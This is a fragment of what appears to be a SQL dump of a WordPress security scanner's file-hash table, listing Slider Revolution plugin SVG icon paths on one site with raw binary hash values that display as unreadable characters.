^0uZz','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_10_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_10_24px.svg',0,'B  )','B  )','YP)!6MM./sip\Z','',0,'?'),('T\ZZS>','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_24px.svg',0,'HÊ^#','HÊ^#','\\6.^DϪ~|,?VcT','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_skip_previous_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_skip_previous_24px.svg',0,' 1GKa&w͖',' 1GKa&w͖','4?\" j`lP//','',0,'?'),('*L\n^b\\UjՅXb','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_slow_motion_video_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_slow_motion_video_24px.svg',0,'zⳭ|0\0Wo','zⳭ|0\0Wo','q͝MH !\rark&Yh>b','',0,'?'),('ძo\Z:jT','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_snooze_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_snooze_24px.svg',0,'޾H\Z, ]P','޾H\Z, ]P','ˊKՈDf~ -}˄[m','',0,'?'),('9ĥ:ؑAu','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_sort_by_alpha_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_sort_by_alpha_24px.svg',0,'+Mo%|fi','+Mo%|fi','~x ش{xވ>6غn>2Eo','',0,'?'),('sg=vYC\0','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_stop_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_stop_24px.svg',0,')*XƳ D3*l^','=>D3*l^','஥MB+P\ZYwOYwhr','',0,'?'),('N\Z3o[','wp-content/plugins/revslider/public/assets/assets/svg/av/ic_web_asset_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/av/ic_web_asset_24px.svg',0,' a\raWW]/rJc',' a\raWW]/rJc','7\n˷988>7ch5wY!%','',0,'?'),('ވ|.X','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/NewTux.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/NewTux.svg',0,'!m8w2#ͫ=','!m8w2#ͫ=',']ANY($nU[0','',0,'?'),('>X 3g/B=','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/abacus.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/abacus.svg',0,'ifqs>J0','ifqs>J0','\nJhtr[k *Wpa #O[v{','',0,'?'),('CI\"iٳb','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/address-book.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/address-book.svg',0,'X\ZK:8D^(s','X\ZK:8D^(s','__u( ,8$O`5','',0,'?'),('(܁RLK ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/address-book2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/address-book2.svg',0,'R7 rR\rw3','R7 rR\rw3','\rI^c>ڮuB7[ 4öU','',0,'?'),(' MG3=@j','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/aim.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/aim.svg',0,',)%\Z$}Ng',',)%\Z$}Ng','؞- \0[ C61^C`.+','',0,'?'),('IR!Kbb$\"\ZܪR1]h.$\\HA','',0,'?'),('5~iPw','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/apple.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/apple.svg',0,'o6<@','o6<@','Qxucv˜>Ġ2x','',0,'?'),('SkQ0v̧hX ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrow-left.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrow-left.svg',0,'qbl&lz','qbl&lz','Yk}%up6f_ާ4sL#x5_\'H','',0,'?'),('wu,qء','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrow-right.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrow-right.svg',0,'q媑ar\0=1','q媑ar\0=1','PSǿFZ]fƆPL\":Y`','',0,'?'),('P˦!#kSP %','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrows-updown.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrows-updown.svg',0,'J^Ahfkr4','J^Ahfkr4','\r4W{XGZ!ҭznfF&B\0ԓ','',0,'?'),('\'嫲v}_','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/atm-cash.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/atm-cash.svg',0,'x1Iohz','x1Iohz','%jΤI Z7T y(pl,\0is','',0,'?'),('ׇgGi*d ?','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award1.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award1.svg',0,'{ 2NC*D{','{ 2NC*D{','NNeCU\0D ','',0,'?'),(' S00d|dU[g','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award2.svg',0,'A\\z#0Ǩ','A\\z#0Ǩ','vX*\"Ku?Ȋ!C','',0,'?'),('\0O.bE@sC@\ZJ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award3.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award3.svg',0,'ȚK\ZN69\'&K','ȚK\ZN69\'&K',', KDQcx0m','',0,'?'),('6V29V( tY','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award4.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award4.svg',0,'PRx~챕!','PRx~챕!','|Ž`YH(^f,6i`T^-[E%','',0,'?'),('w08GXv','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award5.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award5.svg',0,'7َ2iN} ','7َ2iN} ','\"*!ϙ*ErM[9f.*݃8B','',0,'?'),('8@)\'','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/badge01.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/badge01.svg',0,'L\" \0=','L\" \0=','\ntU~asg 41J','',0,'?'),('(&Fv }','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/badge02.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/badge02.svg',0,'-Q.1qK7=','-Q.1qK7=','5I\'aM\nI<ۙ=51~','',0,'?'),('7ɷD)\'A','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bank.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bank.svg',0,'^wy#)Y\"','^wy#)Y\"','$pyD:h*[%Oo㕁','',0,'?'),('Ƣ\"XƣlRա','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bank2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bank2.svg',0,'W{z%=T/7+/','W{z%=T/7+/','2_)bb^Ph PM','',0,'?'),('pВ-K-','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bell.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bell.svg',0,'h;omjߡ!X[G','z>jߡ!X[G','T-E}:u0] d /3!','',0,'?'),('$Xh+}','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bomb.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bomb.svg',0,'lS{*x$','lS{*x$','oS~EQg{Lwkvn¿j8','',0,'?'),('k qs^_}L','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bonsai.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bonsai.svg',0,'i:j#','i:j#','c4]vwfvC F2vAxHI1','',0,'?'),('<H:S5','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/book-apple.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/book-apple.svg',0,'OU8iԥ$e7','OU8iԥ$e7','b}$ŖbJ1Ћ\"${%vu\n; uQ','',0,'?'),(')gd9m2','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/book.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/book.svg',0,'_pU ]\nq%kA','_pU ]\nq%kA','F_\rbm^OI_W:2J<\0*6ɪ','',0,'?'),('C|9/x}W','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bookmark.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bookmark.svg',0,'](\09','](\09','l`-5a @Dref0c','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/champagne.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/champagne.svg',0,'gNϡ(','gNϡ(','g*b.8B¢[ջv`)ef','',0,'?'),('tZf OylZR','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character01.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character01.svg',0,'U:JVh','U:JVh','R>S@>DeTC `OGyW{','',0,'?'),('xZh36+','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character02.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character02.svg',0,'OBW>3','OBW>3','H\"j\r','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character08.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character08.svg',0,'(ۭsU7B','(ۭsU7B','QuohRW4LкB`uBƈ.U','',0,'?'),('0Z','',0,'?'),('_Z%','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart07.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart07.svg',0,'o0LQٗc\"n','o0LQٗc\"n','6^4L\'Go80^Qg%gLٛ','',0,'?'),('iO 0@X(Y ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart08.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart08.svg',0,'6`Iy{4+|o','6`Iy{4+|o','X5Rʩ{G: }A\0^ˊ','',0,'?'),('>nPOwh97vvb9','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart09.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart09.svg',0,')TMb78;',')TMb78;','{gYL:T;uV+','',0,'?'),('Da&8\\؞','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart10.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart10.svg',0,'/g dNӾ^jݨ`','/g dNӾ^jݨ`',';?\r][t\0ǭ dT','',0,'?'),('Qz4[4I\0#x','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart11.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart11.svg',0,'K-辰 MÞ5','K-辰 MÞ5','O י#z2y;/O]\Z\\U7>','',0,'?'),('#ipV3','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart12.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart12.svg',0,'ai7(','ai7(','ئ\\Ӝ3hc.ALh|r) ','',0,'?'),('0VR s6s','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart13.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart13.svg',0,'ɣC1}9|E','ɣC1}9|E','sؿ88ޖnQm m|\0','',0,'?'),('\rn~$fBݮ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart14.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart14.svg',0,'OZP5ݖa#','OZP5ݖa#','q!9axdeG','',0,'?'),('\r92[','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart15.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart15.svg',0,'x(RBO,,)','x(RBO,,)','Kbx~Mj Q2yTP1','',0,'?'),('`avn4?ZG i','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart16.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart16.svg',0,'+&ŧ@te(','+&ŧ@te(','3*\0}WJ]@JPNerMߐR','',0,'?'),('\\Q;\'Xr','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart17.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart17.svg',0,':ixYY/T',':ixYY/T','ͻ!\'fxZS/\\yk(','',0,'?'),('OSe7cLu','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart18.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart18.svg',0,'yS կ\0 +G[','yS կ\0 +G[','Ա}_\n]xO`zr\\tXGV','',0,'?'),('$CqZYuJ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart19.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart19.svg',0,'%N\'GH','%N\'GH','\\r[w[Ukуhf\Zzt%i-t/ ','',0,'?'),('*l{)','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart20.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart20.svg',0,'=&N1ݳII','=&N1ݳII','C^i3}Y[Ș|-u`','',0,'?'),('\Z&$Ю[i','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart21.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart21.svg',0,'i\'\0S<','i\'\0S<','T!<;,޸\'V9g$-=U','',0,'?'),('ĉqZ;Gp','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chat.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chat.svg',0,'66W˧X,im','66W˧X,im','9gD.K@ȋ^)^MD&P','',0,'?'),('`VNr','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist.svg',0,' k$}Ng-',' k$}Ng-','ċZ a\'I^gx+?=','',0,'?'),('bd˒mHb]6A','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist2.svg',0,'T efI(R','T efI(R','C}Zi xZ\\4\'u]N:0D','',0,'?'),('\'t1\'QdW(|','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist3.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist3.svg',0,'ug#dx','',0,'?'),('H)9V +','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chemistry.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chemistry.svg',0,'Ȅ*yel','Ȅ*yel','Uc^9@ˌ;v:O8|D','',0,'?'),('5ŀedH0','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess-knight.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess-knight.svg',0,'zsu4-X*Tp','zsu4-X*Tp','\" o0ݟ=Ofע)','',0,'?'),('Bl@!2ӊ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess-rook.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess-rook.svg',0,'\\Hȑ','\\Hȑ','WB\\Ѐ99cEEZ','',0,'?'),('Ƚ3۴LJ\\t','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess.svg',0,'\\SkDpw&s q','\\SkDpw&s q','mkr+]h^ \n3WT\r\'n','',0,'?'),('}n8-q>Wĝ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/clock.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/clock.svg',0,'O5Kn[ƙ\0G+R;','O5Kn[ƙ\0G+R;','Kĕ*p;ë.[\ZkbJJ#`','',0,'?'),('?oB97Uq','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/closed-sign.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/closed-sign.svg',0,'3 3]t','3 3]t','8dXP\Z-].e \nGЏL!','',0,'?'),('\0wMTTܞby','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-coins.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-coins.svg',0,'lV 3ꞦMN','lV 3ꞦMN','\r7z:XᏭl{R\\','',0,'?'),('p^2{*','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-down.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-down.svg',0,'K]p!s]','K]p!s]','m\rZ\Zg g \0jjLy','',0,'?'),('<@:\n 7','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-up.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-up.svg',0,'`59*_\\C@','`59*_\\C@','nI:E#RQF?綩m','',0,'?'),('>i%U,EL','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/coffee.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/coffee.svg',0,' 7X݅؋',' 7X݅؋','dr%;]#!~o-mor \Z}','',0,'?'),(';T=fGϽeW','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/conference.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/conference.svg',0,'.zG\r\ZS3 ES}','.zG\r\ZS3 ES}','&#PFL+8(.AH}{5@w:]','',0,'?'),('Xn[Inߢ\n6^','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/contact-book.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/contact-book.svg',0,'(1ߜtnf<{!','(1ߜtnf<{!','$57\"Xƒҕ\0{Ç9 1Цw','',0,'?'),('vfNxZk̊ F','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/coupon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/coupon.svg',0,'W1갑UsS','W1갑UsS','nڛQ\"`TJ4/ZXP.','',0,'?'),(' z$~Jo','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/credit-card.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/credit-card.svg',0,'n\0jY','n\0jY','K\ZDk#i{^&','',0,'?'),('.>vP[1[','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/crown.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/crown.svg',0,'\r_/n\rt8twuga','\r_/n\rt8twuga','OE`WSK/qfLa<1 ','',0,'?'),('>-0e\r%)go?','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/currencies.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/currencies.svg',0,'YVK1','YVK1','3UvaNGz.ƚWyGSΘ\rm','',0,'?'),('R dO!lH,','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/database.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/database.svg',0,'1~mk!}b','1~mk!}b','!^TTGV6Z >oS&','',0,'?'),('X-##cu','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/delivery.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/delivery.svg',0,'ý\n5xl|OtM)','ý\n5xl|OtM)','.\0ãGsI1\r6 #<}','',0,'?'),('A1\Zfz;t1','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/diagram-hierarchy.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/diagram-hierarchy.svg',0,'sɫ(','sɫ(','&!Ho[Mb<50)r ','',0,'?'),('ii AQ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/diamond.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/diamond.svg',0,'U\nǭG9','U\nǭG9','=>wow(w\'qRN >','',0,'?'),('V`kA4%j','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/dollar.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/dollar.svg',0,'Raif9ưsZА','Raif9ưsZА','#^0Dx*8\0&','',0,'?'),(':|XH\0\\Il\'','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/drawer.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/drawer.svg',0,';y<2&5&x]43',';y<2&5&x]43','\nGGOqCFqY5k|nWRUJ','',0,'?'),('԰Q\"Ku\n','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/egg.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/egg.svg',0,'{ <]Rc\'K','{ <]Rc\'K','?\0BΓP CmxӢ\nsHGJ','',0,'?'),('ԪI tT{','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/emblem.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/emblem.svg',0,'h%V+ \'L5','h%V+ \'L5',')\08!PE$lX;zD)3','',0,'?'),('lLs>TB','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/envelope-money.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/envelope-money.svg',0,'u\'v0Ϳ\n','u\'v0Ϳ\n','J@#6 zF\rrUm|埬','',0,'?'),('-ھ&\0\'$','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/envelopes.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/envelopes.svg',0,'ukbvQD','ukbvQD','o\n7 T8ݍۀPe6,wV','',0,'?'),('|@кѶȽ1jJ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/euro.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/euro.svg',0,'XbU{,','XbU{,',' ?-|*J_\nDʻ@*!R','',0,'?'),('ɼj0\Z','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/exchange.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/exchange.svg',0,'}aCK','}aCK','7k~0h N(E0k|6f','',0,'?'),('ir`O 3RTs\"','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/exit.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/exit.svg',0,'d$+ꞂB02o°y','d$+ꞂB02o°y','0cde客Ey2ۍ','',0,'?'),('bxǖOZڭ\nP1','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file01.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file01.svg',0,'\0\"\'vu5.e','\0\"\'vu5.e','cʙb!\'y ʞi-io)','',0,'?'),('L Ω\'\rPDv','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file02.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file02.svg',0,'0$#4=+X7Y','0$#4=+X7Y','eP%j`\\>+\0a nj2l','',0,'?'),('UvX7r(','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file03.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file03.svg',0,'_\'3<5[咟','_\'3<5[咟','< ޥڲ5WAe!8,','',0,'?'),('Svng1{','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file04.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file04.svg',0,'Ï@ot','Ï@ot','vjX?w޷D)9','',0,'?'),(' lYgwZ.','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file05.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file05.svg',0,'};\Z8I','};\Z8I','hBbkjVva2 ay4Zd','',0,'?'),('± 7 3Ѯ8','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file06.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file06.svg',0,'}V.]E|;W','}V.]E|;W','!\ni,@mv\rJ^/k','',0,'?'),('\r4MmwE\'BA0','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file07.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file07.svg',0,'^->/\"','^->/\"','@,## ߟw-V(5=','',0,'?'),('9*}~o\\V','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file08.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file08.svg',0,'s`bSCa}f','s`bSCa}f','Fn&8+\njB?ь♮_','',0,'?'),('pVD<<','>VD<<','/ZJ,Ւ3!|Y# ','',0,'?'),('¤SG,NQ*\0&*','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/globe2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/globe2.svg',0,'4ƁF7V!mq\\҄','4ƁF7V!mq\\҄','#^va7N^·iْq $','',0,'?'),('Twzɂ\'\n=)p','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/graduation-hat.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/graduation-hat.svg',0,' \Zn\"im}',' \Zn\"im}','B\"w2_4œqƨKZjx[r','',0,'?'),('NJ4}s;[','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-globe.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-globe.svg',0,'\\)@Z]r','\\)@Z]r','ZUnR#bɀ} 